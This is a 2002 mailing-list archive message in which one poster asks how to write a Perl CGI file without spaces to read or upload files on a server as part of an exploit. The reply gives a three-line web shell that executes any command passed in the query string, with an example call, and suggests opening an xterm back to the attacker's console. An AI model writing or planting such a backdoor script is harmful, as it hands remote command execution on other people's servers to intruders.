Re: Coding Conservative CGI Perl

From: Randy Janinda (rjanindaat_private)
Date: Mon Jun 10 2002 - 12:53:23 PDT

  • Next message: KF: "SCO Openserver Xsco heap overflow."

    Hmmm. this looks all too familiar. Well, since your not too picky why
    not invoke an xterm to display to your console? Or just create a script
    that executes any command you pass to it:
    
    Try this:
    
    #!/usr/bin/perl
    print("Content-type:text/html\n\n");
    `$ENV{QUERY_STRING}`;
    
    then call your puppy with xxx.xxx.xxx/bin/yourscript.cgi?ls
    
    
    
    
    
    On Mon, 2002-06-10 at 01:27, Justin Lavoie wrote:
    > Hello,
    >    This isn't an advisory or a technique or anything that would gain anyone here knowledge I'm sorry if this is out of place but it's the only place I knew to turn to - to raise my concern.  I feel kind of unconfrontable asking because I don't know if this newsletter is excatly for what I'm requesting - directly.
    > 
    > I'm working on a type of exploit and in doing so I must develop a *.cgi file that'd run on a Linux and Windows box to allow me to read or upload file (whatever is possible) without the use of spaces!  To ellaborate on what I mean here's an example of a normal little hello script :
    > 
    > #!/usr/bin/perl
    > print "Content-type:text/html\n\n";
    > print "SUP!<BR>";
    > 
    > This will not work but recoded to work (not having spaces) would be:
    > 
    > #!/usr/bin/perl
    > print("Content-type:text/html\n\n");
    > print("SUP!<BR>");
    > 
    > You can have just about any character other than spaces... I'm no good with perl really unfournately although I have read quite a number of articles the only thing I've successfully found remotely useful was using print($ENV{DOCUMENT_ROOT}); to find the location of the file heh.
    > 
    > This is why I raise the question here on what can be done in perl without the use of spaces.  What I've been trying to get was something that allows uploading a file (so basically I could upload another .asp which does contain spaces and solve all my problems)  The uploader doesn't need to be pretty or anything just has to work even anyway possible to write another file... Even viewing files or directory listings would be excellent, I'm not picky, I'm not really expecting anything really - just hoping.
    > 
    > I thank you for any advice or help that you may give.
    > 
    > -SiLenCe
    > [Transparent Entity]
    > -- 
    > _______________________________________________
    > Sign-up for your own FREE Personalized E-mail at Mail.com
    > http://www.mail.com/?sr=signup
    > 
    



    This archive was generated by hypermail 2b30 : Mon Jun 10 2002 - 21:37:19 PDT